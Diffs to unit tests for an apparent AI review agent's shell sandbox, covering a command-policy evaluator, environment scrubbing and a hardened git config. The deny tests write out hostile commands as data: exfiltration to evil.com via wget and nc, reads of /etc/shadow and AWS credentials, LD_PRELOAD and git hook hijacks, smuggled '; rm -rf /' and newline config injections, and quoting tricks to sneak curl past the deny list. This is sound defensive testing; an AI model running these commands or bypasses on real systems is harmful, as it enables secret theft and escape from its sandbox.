+    expect(BestEffortMacOSDriver).toHaveBeenCalledWith('/home/runner/work/repo');
+  });
+});
+
+describe('detectSandboxDriver — QUALOPS_ALLOW_UNSANDBOXED fallback', () => {
+  it('returns NoneSandboxDriver when set and no driver is available', () => {
+    process.env['QUALOPS_ALLOW_UNSANDBOXED'] = '1';
+    const driver = detectSandboxDriver();
+    expect(driver.name).toBe('none');
+  });
+
+  it('throws when no driver is available and QUALOPS_ALLOW_UNSANDBOXED is unset', () => {
+    expect(() => detectSandboxDriver()).toThrow('No sandbox driver available');
+  });
+});

--- a/tests/unit/stages/review/agentic/tools/bash/env-scrub.spec.ts
+++ b/tests/unit/stages/review/agentic/tools/bash/env-scrub.spec.ts
@@ -74,6 +74,21 @@ describe('scrubEnv', () => {
     expect(env['GIT_CONFIG_GLOBAL']).toBe('/tmp/test-gitconfig');
   });
 
+  test('GIT_CEILING_DIRECTORIES defaults to /workspace when workspaceRoot is absent', () => {
+    const { env } = scrubEnv({});
+    expect(env['GIT_CEILING_DIRECTORIES']).toBe('/workspace');
+  });
+
+  test('GIT_CEILING_DIRECTORIES is parent of workspaceRoot for CI layout', () => {
+    const { env } = scrubEnv({}, undefined, '/workspace/pr');
+    expect(env['GIT_CEILING_DIRECTORIES']).toBe('/workspace');
+  });
+
+  test('GIT_CEILING_DIRECTORIES is parent of workspaceRoot for local checkout', () => {
+    const { env } = scrubEnv({}, undefined, '/home/runner/work/my-repo/my-repo');
+    expect(env['GIT_CEILING_DIRECTORIES']).toBe('/home/runner/work/my-repo');
+  });
+
   test('sets QUALOPS_ENV_SCRUBBED=1', () => {
     const { env } = scrubEnv({});
     expect(env['QUALOPS_ENV_SCRUBBED']).toBe('1');

--- a/tests/unit/stages/review/agentic/tools/bash/git-config-template.spec.ts
+++ b/tests/unit/stages/review/agentic/tools/bash/git-config-template.spec.ts
@@ -11,23 +11,38 @@ describe('git-config-template', () => {
     cleanupGitConfig();
   });
 
-  it('getGitConfigContent returns the hardened config string', () => {
+  it('returns hardened security settings regardless of workspaceRoot', () => {
     const content = getGitConfigContent();
     expect(content).toContain('hooksPath = /dev/null');
     expect(content).toContain('fsmonitor = false');
     expect(content).toContain('helper = /bin/false');
   });
 
-  it('getGitConfigPath writes a file and returns its path', () => {
-    const p = getGitConfigPath();
-    expect(fs.existsSync(p)).toBe(true);
-    const written = fs.readFileSync(p, 'utf8');
-    expect(written).toContain('hooksPath = /dev/null');
+  it('CI root includes both /workspace/pr and /workspace/base as safe directories', () => {
+    const content = getGitConfigContent('/workspace/pr');
+    expect(content).toContain('directory = /workspace/pr');
+    expect(content).toContain('directory = /workspace/base');
   });
 
-  it('getGitConfigPath is idempotent — same path on repeated calls', () => {
-    const p1 = getGitConfigPath();
-    const p2 = getGitConfigPath();
+  it('local root uses only the actual checkout path as safe directory', () => {
+    const localRoot = '/home/runner/work/my-repo/my-repo';
+    const content = getGitConfigContent(localRoot);
+    expect(content).toContain(`directory = ${localRoot}`);
+    expect(content).not.toContain('/workspace/pr');
+    expect(content).not.toContain('/workspace/base');
+  });
+
+  it('getGitConfigPath writes a file containing the correct safe.directory', () => {
+    const localRoot = '/home/runner/work/my-repo/my-repo';
+    const p = getGitConfigPath(localRoot);
+    expect(fs.existsSync(p)).toBe(true);
+    const written = fs.readFileSync(p, 'utf8');
+    expect(written).toContain(`directory = ${localRoot}`);
+  });
+
+  it('getGitConfigPath is idempotent for the same root', () => {
+    const p1 = getGitConfigPath('/workspace/pr');
+    const p2 = getGitConfigPath('/workspace/pr');
     expect(p1).toBe(p2);
   });
 

--- a/tests/unit/stages/review/agentic/tools/bash/git-config-template.spec.ts
+++ b/tests/unit/stages/review/agentic/tools/bash/git-config-template.spec.ts
@@ -63,7 +63,15 @@ describe('git-config-template', () => {
     );
   });
 
-  it('throws when workspaceRoot contains other shell metacharacters', () => {
-    expect(() => getGitConfigContent('/workspace/pr; rm -rf /')).toThrow('Invalid workspaceRoot');
+  it('throws when workspaceRoot contains a null byte', () => {
+    expect(() => getGitConfigContent('/workspace/pr\x00evil')).toThrow('Invalid workspaceRoot');
+  });
+
+  it('accepts paths with UTF-8 characters', () => {
+    expect(() => getGitConfigContent('/home/user/repos/projekt-ü')).not.toThrow();
+  });
+
+  it('accepts paths with spaces', () => {
+    expect(() => getGitConfigContent('/home/user/my repo')).not.toThrow();
   });
 });

--- a/tests/unit/stages/review/agentic/tools/bash/git-config-template.spec.ts
+++ b/tests/unit/stages/review/agentic/tools/bash/git-config-template.spec.ts
@@ -56,4 +56,14 @@ describe('git-config-template', () => {
   it('cleanupGitConfig is a no-op when called without a path', () => {
     expect(() => cleanupGitConfig()).not.toThrow();
   });
+
+  it('throws when workspaceRoot contains a newline (config injection attempt)', () => {
+    expect(() => getGitConfigContent('/workspace/pr\n[core]\n\thooksPath = /tmp/evil')).toThrow(
+      'Invalid workspaceRoot',
+    );
+  });
+
+  it('throws when workspaceRoot contains other shell metacharacters', () => {
+    expect(() => getGitConfigContent('/workspace/pr; rm -rf /')).toThrow('Invalid workspaceRoot');
+  });
 });

--- a/tests/unit/stages/review/agentic/tools/bash/policy.spec.ts
+++ b/tests/unit/stages/review/agentic/tools/bash/policy.spec.ts
@@ -1,10 +1,6 @@
 import { evaluatePolicy } from '../../../../../../../src/stages/review/agentic/tools/bash/policy';
 
 describe('evaluatePolicy', () => {
-  // --------------------------------------------------------------------------
-  // ALLOW cases (§3.8 compatibility table)
-  // --------------------------------------------------------------------------
-
   describe('allowed commands', () => {
     it('git log is allowed', () => {
       expect(evaluatePolicy('git log --oneline -10')).toEqual({ deny: false });
@@ -112,10 +108,6 @@ describe('evaluatePolicy', () => {
       expect(evaluatePolicy("bash -c 'echo hello'")).toEqual({ deny: false });
     });
   });
-
-  // --------------------------------------------------------------------------
-  // DENY cases (§3.5 hard-deny list)
-  // --------------------------------------------------------------------------
 
   describe('denied commands', () => {
     it('curl is denied', () => {
@@ -316,10 +308,6 @@ describe('evaluatePolicy', () => {
     });
   });
 
-  // --------------------------------------------------------------------------
-  // Extra config: extraDeniedBinaries
-  // --------------------------------------------------------------------------
-
   describe('extraDeniedBinaries config', () => {
     it('custom denied binary is blocked', () => {
       const result = evaluatePolicy('my-custom-tool --dump', {
@@ -335,10 +323,6 @@ describe('evaluatePolicy', () => {
       expect(result.deny).toBe(false);
     });
   });
-
-  // --------------------------------------------------------------------------
-  // §3.5 spec rules not yet covered
-  // --------------------------------------------------------------------------
 
   describe('additional spec §3.5 deny rules', () => {
     // Background / session escape
@@ -496,10 +480,6 @@ describe('evaluatePolicy', () => {
     });
   });
 
-  // --------------------------------------------------------------------------
-  // workspaceRoot: CI (/workspace/pr) vs local (arbitrary path)
-  // --------------------------------------------------------------------------
-
   describe('workspaceRoot variants — CI vs local', () => {
     const LOCAL_ROOT = '/home/runner/work/my-repo/my-repo';
 
@@ -539,10 +519,6 @@ describe('evaluatePolicy', () => {
       expect(evaluatePolicy('cat ../../etc/passwd', { workspaceRoot: LOCAL_ROOT }).deny).toBe(true);
     });
   });
-
-  // --------------------------------------------------------------------------
-  // §3.8 compatibility allows not yet covered
-  // --------------------------------------------------------------------------
 
   describe('additional spec §3.8 compatibility allows', () => {
     it('mysql -e SQL is allowed', () => {
@@ -602,10 +578,6 @@ describe('evaluatePolicy', () => {
     });
   });
 
-  // --------------------------------------------------------------------------
-  // Partial quoting denial
-  // --------------------------------------------------------------------------
-
   describe('partial quoting denial', () => {
     it('"cu"rl bypasses deny list without this fix — must be denied', () => {
       // unquoteArg only strips fully-wrapped quotes; "cu"rl stays as "cu"rl,
@@ -643,10 +615,6 @@ describe('evaluatePolicy', () => {
     });
   });
 
-  // --------------------------------------------------------------------------
-  // ANSI-C quoting denial
-  // --------------------------------------------------------------------------
-
   describe('ANSI-C quoting denial', () => {
     it('hex-encoded curl bypasses binary deny list without this fix — must be denied', () => {
       // $'\x63\x75\x72\x6c' is ANSI-C for 'curl'; bash would execute curl.
@@ -672,10 +640,6 @@ describe('evaluatePolicy', () => {
       expect(evaluatePolicy("echo $'hello world'").deny).toBe(true);
     });
   });
-
-  // --------------------------------------------------------------------------
-  // Command substitution denial
-  // --------------------------------------------------------------------------
 
   describe('command substitution denial', () => {
     it('echo with bare $() subshell is denied', () => {
@@ -708,10 +672,6 @@ describe('evaluatePolicy', () => {
       expect(evaluatePolicy('diff <(rg foo a) <(rg foo b)').deny).toBe(false);
     });
   });
-
-  // --------------------------------------------------------------------------
-  // Environment variable injection denial (checkEnvHijacking extensions)
-  // --------------------------------------------------------------------------
 
   describe('env-hijacking denial extensions', () => {
     it('BASH_ENV inline assignment is denied', () => {

--- a/tests/unit/stages/review/agentic/tools/bash/policy.spec.ts
+++ b/tests/unit/stages/review/agentic/tools/bash/policy.spec.ts
@@ -497,6 +497,50 @@ describe('evaluatePolicy', () => {
   });
 
   // --------------------------------------------------------------------------
+  // workspaceRoot: CI (/workspace/pr) vs local (arbitrary path)
+  // --------------------------------------------------------------------------
+
+  describe('workspaceRoot variants — CI vs local', () => {
+    const LOCAL_ROOT = '/home/runner/work/my-repo/my-repo';
+
+    test('cat inside local workspaceRoot is allowed', () => {
+      expect(
+        evaluatePolicy(`cat ${LOCAL_ROOT}/src/auth.ts`, { workspaceRoot: LOCAL_ROOT }).deny,
+      ).toBe(false);
+    });
+
+    test('cat outside local workspaceRoot is denied', () => {
+      expect(
+        evaluatePolicy('cat /workspace/pr/src/auth.ts', { workspaceRoot: LOCAL_ROOT }).deny,
+      ).toBe(true);
+    });
+
+    test('cat inside CI /workspace/pr is allowed', () => {
+      expect(
+        evaluatePolicy('cat /workspace/pr/src/auth.ts', { workspaceRoot: '/workspace/pr' }).deny,
+      ).toBe(false);
+    });
+
+    test('cat outside CI root targeting local path is denied', () => {
+      expect(
+        evaluatePolicy(`cat ${LOCAL_ROOT}/src/auth.ts`, { workspaceRoot: '/workspace/pr' }).deny,
+      ).toBe(true);
+    });
+
+    test('cd to local workspaceRoot is allowed', () => {
+      expect(evaluatePolicy(`cd ${LOCAL_ROOT}`, { workspaceRoot: LOCAL_ROOT }).deny).toBe(false);
+    });
+
+    test('cd to /workspace/pr is denied when workspaceRoot is local path', () => {
+      expect(evaluatePolicy('cd /workspace/pr', { workspaceRoot: LOCAL_ROOT }).deny).toBe(true);
+    });
+
+    test('relative path traversal is denied regardless of workspaceRoot', () => {
+      expect(evaluatePolicy('cat ../../etc/passwd', { workspaceRoot: LOCAL_ROOT }).deny).toBe(true);
+    });
+  });
+
+  // --------------------------------------------------------------------------
   // §3.8 compatibility allows not yet covered
   // --------------------------------------------------------------------------
 

--- a/tests/unit/stages/review/agentic/tools/bash/policy.spec.ts
+++ b/tests/unit/stages/review/agentic/tools/bash/policy.spec.ts
@@ -6,61 +6,61 @@ describe('evaluatePolicy', () => {
   // --------------------------------------------------------------------------
 
   describe('allowed commands', () => {
-    test('git log is allowed', () => {
+    it('git log is allowed', () => {
       expect(evaluatePolicy('git log --oneline -10')).toEqual({ deny: false });
     });
 
-    test('git diff is allowed', () => {
+    it('git diff is allowed', () => {
       expect(evaluatePolicy('git diff HEAD~1 HEAD -- src/')).toEqual({ deny: false });
     });
 
-    test('git status is allowed', () => {
+    it('git status is allowed', () => {
       expect(evaluatePolicy('git status')).toEqual({ deny: false });
     });
 
-    test('rg search is allowed', () => {
+    it('rg search is allowed', () => {
       expect(evaluatePolicy('rg "password" /workspace/pr -l')).toEqual({ deny: false });
     });
 
-    test('grep search is allowed', () => {
+    it('grep search is allowed', () => {
       expect(evaluatePolicy('grep -r "TODO" /workspace/pr/src --include="*.ts"')).toEqual({
         deny: false,
       });
     });
 
-    test('cat file is allowed', () => {
+    it('cat file is allowed', () => {
       expect(evaluatePolicy('cat /workspace/pr/src/auth.ts')).toEqual({ deny: false });
     });
 
-    test('head file is allowed', () => {
+    it('head file is allowed', () => {
       expect(evaluatePolicy('head -100 /workspace/pr/src/auth.ts')).toEqual({ deny: false });
     });
 
-    test('tail -n N file is allowed (non-follow)', () => {
+    it('tail -n N file is allowed (non-follow)', () => {
       expect(evaluatePolicy('tail -n 20 /workspace/pr/logs/test.log')).toEqual({ deny: false });
     });
 
-    test('find without -exec is allowed', () => {
+    it('find without -exec is allowed', () => {
       expect(
         evaluatePolicy('find /workspace/pr -name "*.env*" -not -path "*/node_modules/*"'),
       ).toEqual({ deny: false });
     });
 
-    test('jq on package.json is allowed', () => {
+    it('jq on package.json is allowed', () => {
       expect(evaluatePolicy("jq '.dependencies' /workspace/pr/package.json")).toEqual({
         deny: false,
       });
     });
 
-    test('tsc --noEmit is allowed', () => {
+    it('tsc --noEmit is allowed', () => {
       expect(evaluatePolicy('tsc --noEmit')).toEqual({ deny: false });
     });
 
-    test('eslint is allowed', () => {
+    it('eslint is allowed', () => {
       expect(evaluatePolicy('eslint src/ --format json')).toEqual({ deny: false });
     });
 
-    test('python3 -c is allowed', () => {
+    it('python3 -c is allowed', () => {
       expect(
         evaluatePolicy(
           'python3 -c "import ast; print(ast.dump(ast.parse(open(\'file.py\').read())))"',
@@ -68,47 +68,47 @@ describe('evaluatePolicy', () => {
       ).toEqual({ deny: false });
     });
 
-    test('python3 script.py is allowed', () => {
+    it('python3 script.py is allowed', () => {
       expect(evaluatePolicy('python3 /workspace/pr/scripts/check.py')).toEqual({ deny: false });
     });
 
-    test('python3 -m module is allowed', () => {
+    it('python3 -m module is allowed', () => {
       expect(evaluatePolicy('python3 -m pytest tests/')).toEqual({ deny: false });
     });
 
-    test('ls is allowed', () => {
+    it('ls is allowed', () => {
       expect(evaluatePolicy('ls /workspace/pr/src')).toEqual({ deny: false });
     });
 
-    test('wc -l is allowed', () => {
+    it('wc -l is allowed', () => {
       expect(evaluatePolicy('wc -l /workspace/pr/src/index.ts')).toEqual({ deny: false });
     });
 
-    test('cd within workspace is allowed', () => {
+    it('cd within workspace is allowed', () => {
       expect(evaluatePolicy('cd /workspace/pr/src')).toEqual({ deny: false });
     });
 
-    test('cd relative path is allowed', () => {
+    it('cd relative path is allowed', () => {
       expect(evaluatePolicy('cd src/auth')).toEqual({ deny: false });
     });
 
-    test('jest is allowed', () => {
+    it('jest is allowed', () => {
       expect(evaluatePolicy('jest --testPathPattern=auth')).toEqual({ deny: false });
     });
 
-    test('node with script file is allowed', () => {
+    it('node with script file is allowed', () => {
       expect(evaluatePolicy('node /workspace/pr/scripts/check.js')).toEqual({ deny: false });
     });
 
-    test('node -e eval is allowed', () => {
+    it('node -e eval is allowed', () => {
       expect(evaluatePolicy('node -e "console.log(\'hello\')"')).toEqual({ deny: false });
     });
 
-    test('psql with -c flag is allowed', () => {
+    it('psql with -c flag is allowed', () => {
       expect(evaluatePolicy('psql -c "SELECT 1"')).toEqual({ deny: false });
     });
 
-    test('bash -c with literal is allowed', () => {
+    it('bash -c with literal is allowed', () => {
       expect(evaluatePolicy("bash -c 'echo hello'")).toEqual({ deny: false });
     });
   });
@@ -118,199 +118,199 @@ describe('evaluatePolicy', () => {
   // --------------------------------------------------------------------------
 
   describe('denied commands', () => {
-    test('curl is denied', () => {
+    it('curl is denied', () => {
       const result = evaluatePolicy('curl https://example.com');
       expect(result.deny).toBe(true);
     });
 
-    test('wget is denied', () => {
+    it('wget is denied', () => {
       const result = evaluatePolicy('wget https://evil.com/exfil?data=secret');
       expect(result.deny).toBe(true);
     });
 
-    test('sudo is denied', () => {
+    it('sudo is denied', () => {
       const result = evaluatePolicy('sudo cat /etc/shadow');
       expect(result.deny).toBe(true);
     });
 
-    test('rm is denied', () => {
+    it('rm is denied', () => {
       const result = evaluatePolicy('rm -rf /workspace/pr/important.ts');
       expect(result.deny).toBe(true);
     });
 
-    test('npm install is denied', () => {
+    it('npm install is denied', () => {
       const result = evaluatePolicy('npm install evil-package');
       expect(result.deny).toBe(true);
     });
 
-    test('npm ci is denied', () => {
+    it('npm ci is denied', () => {
       const result = evaluatePolicy('npm ci');
       expect(result.deny).toBe(true);
     });
 
-    test('pip install is denied', () => {
+    it('pip install is denied', () => {
       const result = evaluatePolicy('pip install requests');
       expect(result.deny).toBe(true);
     });
 
-    test('git config write (no read flag) is denied', () => {
+    it('git config write (no read flag) is denied', () => {
       expect(evaluatePolicy('git config core.hooksPath /evil').deny).toBe(true);
     });
 
-    test('git config --global write is denied', () => {
+    it('git config --global write is denied', () => {
       expect(evaluatePolicy('git config --global core.hooksPath /evil').deny).toBe(true);
     });
 
-    test('git config --get is allowed', () => {
+    it('git config --get is allowed', () => {
       expect(evaluatePolicy('git config --get core.hooksPath').deny).toBe(false);
     });
 
-    test('git config --list is allowed', () => {
+    it('git config --list is allowed', () => {
       expect(evaluatePolicy('git config --list').deny).toBe(false);
     });
 
-    test('git push is denied', () => {
+    it('git push is denied', () => {
       const result = evaluatePolicy('git push origin main');
       expect(result.deny).toBe(true);
     });
 
-    test('git fetch is denied', () => {
+    it('git fetch is denied', () => {
       const result = evaluatePolicy('git fetch origin');
       expect(result.deny).toBe(true);
     });
 
-    test('git commit is denied', () => {
+    it('git commit is denied', () => {
       const result = evaluatePolicy('git commit -m "evil"');
       expect(result.deny).toBe(true);
     });
 
-    test('git checkout is denied', () => {
+    it('git checkout is denied', () => {
       const result = evaluatePolicy('git checkout main');
       expect(result.deny).toBe(true);
     });
 
-    test('git -c core.fsmonitor= is denied', () => {
+    it('git -c core.fsmonitor= is denied', () => {
       const result = evaluatePolicy('git -c core.fsmonitor=malicious log');
       expect(result.deny).toBe(true);
     });
 
-    test('git -c core.hooksPath= is denied', () => {
+    it('git -c core.hooksPath= is denied', () => {
       const result = evaluatePolicy('git -c core.hooksPath=/evil log');
       expect(result.deny).toBe(true);
     });
 
-    test('git -ccore.hooksPath= (concatenated, no space) is denied', () => {
+    it('git -ccore.hooksPath= (concatenated, no space) is denied', () => {
       const result = evaluatePolicy('git -ccore.hooksPath=/evil log');
       expect(result.deny).toBe(true);
     });
 
-    test('LD_PRELOAD env var is denied', () => {
+    it('LD_PRELOAD env var is denied', () => {
       const result = evaluatePolicy('LD_PRELOAD=/evil.so cat /etc/passwd');
       expect(result.deny).toBe(true);
     });
 
-    test('DYLD_INSERT_LIBRARIES is denied', () => {
+    it('DYLD_INSERT_LIBRARIES is denied', () => {
       const result = evaluatePolicy('DYLD_INSERT_LIBRARIES=/evil.dylib ls');
       expect(result.deny).toBe(true);
     });
 
-    test('trailing & is denied', () => {
+    it('trailing & is denied', () => {
       const result = evaluatePolicy('cat /etc/passwd &');
       expect(result.deny).toBe(true);
     });
 
-    test('nohup is denied', () => {
+    it('nohup is denied', () => {
       const result = evaluatePolicy('nohup evil-script.sh &');
       expect(result.deny).toBe(true);
     });
 
-    test('bare python (REPL) is denied', () => {
+    it('bare python (REPL) is denied', () => {
       const result = evaluatePolicy('python3');
       expect(result.deny).toBe(true);
     });
 
-    test('bare node (REPL) is denied', () => {
+    it('bare node (REPL) is denied', () => {
       const result = evaluatePolicy('node');
       expect(result.deny).toBe(true);
     });
 
-    test('bare psql (REPL) is denied', () => {
+    it('bare psql (REPL) is denied', () => {
       const result = evaluatePolicy('psql postgres://user:pass@host/db');
       expect(result.deny).toBe(true);
     });
 
-    test('cd to /etc is denied', () => {
+    it('cd to /etc is denied', () => {
       const result = evaluatePolicy('cd /etc');
       expect(result.deny).toBe(true);
     });
 
-    test('cd /workspace/../etc traversal is denied', () => {
+    it('cd /workspace/../etc traversal is denied', () => {
       expect(evaluatePolicy('cd /workspace/../etc', { workspaceRoot: '/workspace' }).deny).toBe(
         true,
       );
     });
 
-    test('cd to /root is denied', () => {
+    it('cd to /root is denied', () => {
       const result = evaluatePolicy('cd /root');
       expect(result.deny).toBe(true);
     });
 
-    test('output redirection to absolute path is denied', () => {
+    it('output redirection to absolute path is denied', () => {
       const result = evaluatePolicy('cat /workspace/pr/src/auth.ts > /tmp/exfil');
       expect(result.deny).toBe(true);
     });
 
-    test('tail -f is denied (interactive)', () => {
+    it('tail -f is denied (interactive)', () => {
       const result = evaluatePolicy('tail -f /workspace/pr/logs/test.log');
       expect(result.deny).toBe(true);
     });
 
-    test('ssh is denied', () => {
+    it('ssh is denied', () => {
       const result = evaluatePolicy('ssh user@host');
       expect(result.deny).toBe(true);
     });
 
-    test('nc (netcat) is denied', () => {
+    it('nc (netcat) is denied', () => {
       const result = evaluatePolicy('nc evil.com 1234');
       expect(result.deny).toBe(true);
     });
 
-    test('docker is denied', () => {
+    it('docker is denied', () => {
       const result = evaluatePolicy('docker run --rm alpine cat /etc/shadow');
       expect(result.deny).toBe(true);
     });
 
-    test('empty command is denied', () => {
+    it('empty command is denied', () => {
       const result = evaluatePolicy('');
       expect(result.deny).toBe(true);
     });
 
-    test('git unknown subcommand is denied', () => {
+    it('git unknown subcommand is denied', () => {
       const result = evaluatePolicy('git bisect start');
       expect(result.deny).toBe(true);
     });
 
-    test('bash -c with variable expansion is denied', () => {
+    it('bash -c with variable expansion is denied', () => {
       const result = evaluatePolicy('bash -c "cat $HOME/.aws/credentials"');
       expect(result.deny).toBe(true);
     });
 
-    test('bash -c with concatenated flag (no space) and expansion is denied', () => {
+    it('bash -c with concatenated flag (no space) and expansion is denied', () => {
       const result = evaluatePolicy('bash -c"cat $HOME/.aws/credentials"');
       expect(result.deny).toBe(true);
     });
 
-    test('bash with no args (REPL) is denied', () => {
+    it('bash with no args (REPL) is denied', () => {
       const result = evaluatePolicy('bash');
       expect(result.deny).toBe(true);
     });
 
-    test('eval is denied', () => {
+    it('eval is denied', () => {
       const result = evaluatePolicy('eval "malicious code"');
       expect(result.deny).toBe(true);
     });
 
-    test('npx with exec is denied', () => {
+    it('npx with exec is denied', () => {
       const result = evaluatePolicy('npx exec evil-pkg');
       expect(result.deny).toBe(true);
     });
@@ -321,14 +321,14 @@ describe('evaluatePolicy', () => {
   // --------------------------------------------------------------------------
 
   describe('extraDeniedBinaries config', () => {
-    test('custom denied binary is blocked', () => {
+    it('custom denied binary is blocked', () => {
       const result = evaluatePolicy('my-custom-tool --dump', {
         extraDeniedBinaries: ['my-custom-tool'],
       });
       expect(result.deny).toBe(true);
     });
 
-    test('non-denied custom binary is allowed', () => {
+    it('non-denied custom binary is allowed', () => {
       const result = evaluatePolicy('other-tool --check', {
         extraDeniedBinaries: ['my-custom-tool'],
       });
@@ -342,156 +342,156 @@ describe('evaluatePolicy', () => {
 
   describe('additional spec §3.5 deny rules', () => {
     // Background / session escape
-    test('setsid is denied', () => {
+    it('setsid is denied', () => {
       expect(evaluatePolicy('setsid daemon &').deny).toBe(true);
     });
 
-    test('disown is denied', () => {
+    it('disown is denied', () => {
       expect(evaluatePolicy('disown %1').deny).toBe(true);
     });
 
-    test('su is denied', () => {
+    it('su is denied', () => {
       expect(evaluatePolicy('su -c "cat /etc/shadow"').deny).toBe(true);
     });
 
-    test('doas is denied', () => {
+    it('doas is denied', () => {
       expect(evaluatePolicy('doas sh').deny).toBe(true);
     });
 
     // cd escape (spec §3.5 lines 912-915)
-    test('cd / is denied', () => {
+    it('cd / is denied', () => {
       expect(evaluatePolicy('cd /').deny).toBe(true);
     });
 
-    test('cd ~ is denied', () => {
+    it('cd ~ is denied', () => {
       expect(evaluatePolicy('cd ~').deny).toBe(true);
     });
 
-    test('cd - is denied', () => {
+    it('cd - is denied', () => {
       expect(evaluatePolicy('cd -').deny).toBe(true);
     });
 
     // LD_LIBRARY_PATH (spec §3.5 line 940)
-    test('LD_LIBRARY_PATH env injection is denied', () => {
+    it('LD_LIBRARY_PATH env injection is denied', () => {
       expect(evaluatePolicy('LD_LIBRARY_PATH=/evil ls').deny).toBe(true);
     });
 
     // git -c dangerous config keys (spec §3.5 lines 922-925)
-    test('git -c gpg.program= is denied', () => {
+    it('git -c gpg.program= is denied', () => {
       expect(evaluatePolicy('git -c gpg.program=/evil/gpg log').deny).toBe(true);
     });
 
-    test('git -c core.editor= is denied', () => {
+    it('git -c core.editor= is denied', () => {
       expect(evaluatePolicy('git -c core.editor=evil commit').deny).toBe(true);
     });
 
-    test('git -c sequence.editor= is denied', () => {
+    it('git -c sequence.editor= is denied', () => {
       expect(evaluatePolicy('git -c sequence.editor=evil rebase').deny).toBe(true);
     });
 
-    test('git -c uploadpack.packObjectsHook= is denied', () => {
+    it('git -c uploadpack.packObjectsHook= is denied', () => {
       expect(evaluatePolicy('git -c uploadpack.packObjectsHook=evil ls-files').deny).toBe(true);
     });
 
-    test('git -c credential.helper= is denied', () => {
+    it('git -c credential.helper= is denied', () => {
       expect(evaluatePolicy('git -c credential.helper=evil log').deny).toBe(true);
     });
 
     // git remote write subcommands (spec §3.5 lines 903-904)
-    test('git remote add is denied', () => {
+    it('git remote add is denied', () => {
       expect(evaluatePolicy('git remote add origin https://evil.com/repo.git').deny).toBe(true);
     });
 
-    test('git remote set-url is denied', () => {
+    it('git remote set-url is denied', () => {
       expect(evaluatePolicy('git remote set-url origin https://evil.com/repo.git').deny).toBe(true);
     });
 
-    test('git remote get-url is allowed', () => {
+    it('git remote get-url is allowed', () => {
       expect(evaluatePolicy('git remote get-url origin').deny).toBe(false);
     });
 
-    test('git remote -v is allowed', () => {
+    it('git remote -v is allowed', () => {
       expect(evaluatePolicy('git remote -v').deny).toBe(false);
     });
 
     // Append redirection to absolute path
-    test('>> to absolute path is denied', () => {
+    it('>> to absolute path is denied', () => {
       expect(evaluatePolicy('cat /workspace/pr/file.ts >> /tmp/exfil').deny).toBe(true);
     });
 
     // Interactive REPL additions (spec §3.5 lines 959-962)
-    test('bare sqlite3 is denied', () => {
+    it('bare sqlite3 is denied', () => {
       expect(evaluatePolicy('sqlite3 /workspace/pr/db.sqlite').deny).toBe(true);
     });
 
-    test('sqlite3 with SQL query is allowed', () => {
+    it('sqlite3 with SQL query is allowed', () => {
       expect(
         evaluatePolicy('sqlite3 /workspace/pr/db.sqlite "SELECT * FROM users LIMIT 5"').deny,
       ).toBe(false);
     });
 
-    test('mongosh is denied', () => {
+    it('mongosh is denied', () => {
       expect(evaluatePolicy('mongosh mongodb://localhost/mydb').deny).toBe(true);
     });
 
-    test('ipython is denied', () => {
+    it('ipython is denied', () => {
       expect(evaluatePolicy('ipython').deny).toBe(true);
     });
 
-    test('deno is denied', () => {
+    it('deno is denied', () => {
       expect(evaluatePolicy('deno').deny).toBe(true);
     });
 
-    test('bun is denied', () => {
+    it('bun is denied', () => {
       expect(evaluatePolicy('bun').deny).toBe(true);
     });
 
     // File-reading tools outside workspace (path-outside-workspace rule)
-    test('cat /etc/passwd is denied', () => {
+    it('cat /etc/passwd is denied', () => {
       expect(evaluatePolicy('cat /etc/passwd').deny).toBe(true);
     });
 
-    test('cat /etc/shadow is denied', () => {
+    it('cat /etc/shadow is denied', () => {
       expect(evaluatePolicy('cat /etc/shadow').deny).toBe(true);
     });
 
-    test('head /etc/passwd is denied', () => {
+    it('head /etc/passwd is denied', () => {
       expect(evaluatePolicy('head /etc/passwd').deny).toBe(true);
     });
 
-    test('cp /etc/passwd /tmp/exfil is denied', () => {
+    it('cp /etc/passwd /tmp/exfil is denied', () => {
       expect(evaluatePolicy('cp /etc/passwd /tmp/exfil').deny).toBe(true);
     });
 
-    test("cat with single-quoted absolute path '/etc/passwd' is denied", () => {
+    it("cat with single-quoted absolute path '/etc/passwd' is denied", () => {
       expect(evaluatePolicy("cat '/etc/passwd'").deny).toBe(true);
     });
 
-    test("cat with ANSI-C quoted path $'/etc/passwd' is denied", () => {
+    it("cat with ANSI-C quoted path $'/etc/passwd' is denied", () => {
       expect(evaluatePolicy("cat $'/etc/passwd'").deny).toBe(true);
     });
 
-    test('cat with double-quoted absolute path "/etc/passwd" is denied', () => {
+    it('cat with double-quoted absolute path "/etc/passwd" is denied', () => {
       expect(evaluatePolicy('cat "/etc/passwd"').deny).toBe(true);
     });
 
-    test('cat within workspace is allowed', () => {
+    it('cat within workspace is allowed', () => {
       expect(
         evaluatePolicy('cat /workspace/pr/src/foo.ts', { workspaceRoot: '/workspace' }).deny,
       ).toBe(false);
     });
 
-    test('cat relative path is allowed', () => {
+    it('cat relative path is allowed', () => {
       expect(evaluatePolicy('cat src/foo.ts').deny).toBe(false);
     });
 
-    test('cat relative path traversal is denied when workspaceRoot is set', () => {
+    it('cat relative path traversal is denied when workspaceRoot is set', () => {
       expect(evaluatePolicy('cat ../../etc/passwd', { workspaceRoot: '/workspace' }).deny).toBe(
         true,
       );
     });
 
-    test('cat relative path within workspace is allowed when workspaceRoot is set', () => {
+    it('cat relative path within workspace is allowed when workspaceRoot is set', () => {
       expect(evaluatePolicy('cat src/foo.ts', { workspaceRoot: '/workspace/pr' }).deny).toBe(false);
     });
   });
@@ -503,39 +503,39 @@ describe('evaluatePolicy', () => {
   describe('workspaceRoot variants — CI vs local', () => {
     const LOCAL_ROOT = '/home/runner/work/my-repo/my-repo';
 
-    test('cat inside local workspaceRoot is allowed', () => {
+    it('cat inside local workspaceRoot is allowed', () => {
       expect(
         evaluatePolicy(`cat ${LOCAL_ROOT}/src/auth.ts`, { workspaceRoot: LOCAL_ROOT }).deny,
       ).toBe(false);
     });
 
-    test('cat outside local workspaceRoot is denied', () => {
+    it('cat outside local workspaceRoot is denied', () => {
       expect(
         evaluatePolicy('cat /workspace/pr/src/auth.ts', { workspaceRoot: LOCAL_ROOT }).deny,
       ).toBe(true);
     });
 
-    test('cat inside CI /workspace/pr is allowed', () => {
+    it('cat inside CI /workspace/pr is allowed', () => {
       expect(
         evaluatePolicy('cat /workspace/pr/src/auth.ts', { workspaceRoot: '/workspace/pr' }).deny,
       ).toBe(false);
     });
 
-    test('cat outside CI root targeting local path is denied', () => {
+    it('cat outside CI root targeting local path is denied', () => {
       expect(
         evaluatePolicy(`cat ${LOCAL_ROOT}/src/auth.ts`, { workspaceRoot: '/workspace/pr' }).deny,
       ).toBe(true);
     });
 
